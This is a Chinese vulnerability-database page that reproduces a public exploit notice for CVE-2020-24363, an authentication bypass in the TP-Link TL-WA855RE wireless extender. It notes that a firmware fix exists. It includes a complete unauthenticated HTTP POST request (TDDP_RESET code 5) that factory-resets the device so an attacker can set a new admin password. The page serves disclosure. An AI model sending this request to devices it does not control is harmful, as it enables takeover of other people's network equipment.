TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass

基本字段

漏洞编号:
SSV-99059
披露/发现时间:
未知
提交时间:
2020-11-30
漏洞等级:
漏洞类别:
安全模式绕过
影响组件:
TP-Link router
(TL-WA855RE(US)_V5_200415)
漏洞作者:
未知
提交者:
VxerLee
CVE-ID:
cve-2020-24363
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB

Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass

Date: 2020/07/29

Exploit Author: malwrforensics

Vendor Homepage: https://tp-link.com

Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip

Version: TL-WA855RE(US)_V5_200415

Tested on: N/A

CVE : 2020-24363

Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware

Details By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device. To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.

POST /?code=5&asyn=0 HTTP/1.1 Host: Content-Length: 7 Accept: text/plain, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Content-Type: text/plain;charset=UTF-8 Origin: http:// Referer: http:// Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close

0|1,0,0

共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 10928
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负